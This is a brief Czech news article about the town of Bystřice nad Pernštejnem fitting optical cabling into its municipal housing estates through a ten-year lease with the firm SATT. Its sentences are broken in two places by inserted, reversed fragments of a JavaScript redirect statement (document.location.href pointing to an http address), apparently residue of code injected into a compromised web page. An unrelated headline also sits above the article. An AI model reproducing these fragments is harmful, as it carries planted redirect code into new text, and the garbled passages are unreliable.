Rainbow page separator

Bystřice buduje optickou síť, lidem přinese kvalitnější signál

Pondělí, 21. srpna 2017

Prezident letos navštíví Meziříčí, Novou Ves a Bystřici

Bystřice nad Pernštejnem / Rychlejší internet a kvalitnější televizní signál obyvatelům městských bytů v bystřických sídlištích zajistí optické rozvody. Práce už začaly v sídlišti 1, postupně se přejde do sídliště 2, aby celá akce skončila v únoru 2018. „Optická síť bude zavedena do všech městských bytů v sídlištích. Pro nájemníky [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude nyní znamenat pouze krátký pobyt montérů v bytě, během kterého osadí v blízkosti vstupních dveří novou zásuvku,“ vyjádřil se vedoucí odboru správy majetku a investic bystřické radnice Aleš Sitař.
Smlouvu na pronájem optické sítě bystřická radnice uzavřela se žďárskou firmou SATT, která si ve městě dlouhá léta pronajímá koaxiální rozvody a lidem zajišťuje jak internet, tak kabelovou televizi.
Bystřici coby vlastníku rozvodné sítě na první etapu, při které bude signálem pokry[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to první a druhé sídliště s byty města, stačí deset milionů korun, jimiž si provozovatel optické sítě předplatil nájem na deset let dopředu.